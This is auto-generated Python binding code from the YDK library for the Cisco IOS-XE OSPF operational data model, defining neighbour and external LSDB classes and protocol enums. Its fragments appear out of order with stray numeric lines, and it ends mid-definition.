(YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])), ('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])), ]) self.nbr_id = None self.address = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.event_count = None self.retrans_count = None self.state = None self.dead_timer = None self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value) class Ospfv2LsdbExternal(Entity): """ The external LSDB information .. attribute:: lsa_type (key) Link State Advertisement type **type**\: int **range:** 0..255 **config**\: False .. attribute:: lsa_id (key) Link State Advertisement Identifer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: advertising_router (key) Advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_age The age of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_options The options of the Link State Advertisement **type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>` **config**\: False .. attribute:: lsa_seq_number The sequence number for the Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_checksum The checksum of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_length The length, in bytes, of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: ospfv2_router_lsa_links The router Link State Advertisement links **type**\: list of :py:class:`Ospfv2RouterLsaLinks <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks>` **config**\: False .. attribute:: unsupported_lsa The unsupported Link State Advertisements **type**\: :py:class:`UnsupportedLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa>` **config**\: False .. attribute:: router_lsa The router Link State Advertisements **type**\: :py:class:`RouterLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa>` **config**\: False .. attribute:: network_lsa The network Link State Advertisements **type**\: :py:class:`NetworkLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa>` **config**\: False .. attribute:: network_summary_lsa The network summary Link State Advertisements **type**\: :py:class:`NetworkSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa>` **config**\: False .. attribute:: router_summary_lsa The router summary Link State Advertisements **type**\: :py:class:`RouterSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa>` **config**\: False .. attribute:: external_lsa The external Link State Advertisements **type**\: :py:class:`ExternalLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa>` **config**\: False .. attribute:: nssa_lsa The Not So Stubby Area Link state advertisements **type**\: :py:class:`NssaLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__() self.yang_name = "ospfv2-lsdb-external" self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): """ The router Link State Advertisement links .. attribute:: link_type (key) Link Type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id (key) link Identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_topo Link topology **type**\: list of :py:class:`LinkTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): """ Link topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric Topology metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): """ The unsupported Link State Advertisements .. attribute:: lsa_data Link State Advertisement data **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): """ The router Link State Advertisements .. attribute:: router_lsa_bits Router Link State Advertisement bits **type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>` **config**\: False .. attribute:: router_lsa_number_links Router Link State Advertisement number of links **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): """ The network Link State Advertisements .. attribute:: network_lsa_mask Network Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: network_attached_routers Network attached routers **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): """ The network summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): """ The router summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): """ The external Link State Advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): """ The Not So Stubby Area Link state advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) def clone_ptr(self): self._top_entity = OspfOperData() return self._top_entity
53.996849
1,779
0.368293
from collections import OrderedDict from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64 from ydk.filters import YFilter from ydk.errors import YError, YModelError from ydk.errors.error_handler import handle_type_error as _handle_type_error class AddressFamily(Enum): address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4") address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6") class NbrStateType(Enum): ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down") ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt") ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init") ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way") ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start") ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange") ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading") ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full") class OspfAuthType(Enum): ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec") ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain") ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key") ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none") class OspfExternalMetricType(Enum): ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1") ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2") class OspfNetworkType(Enum): ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast") ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast") ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint") ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point") class OspfOperationMode(Enum): ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night") class Ospfv2AuthTypeSelection(Enum): ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none") ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key") ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain") class Ospfv2CryptoAlgorithm(Enum): ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest") ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5") class Ospfv2IntfState(Enum): ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down") ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback") ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting") ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint") ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point") ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr") ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup") ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other") class Ospfv2LsaType(Enum): 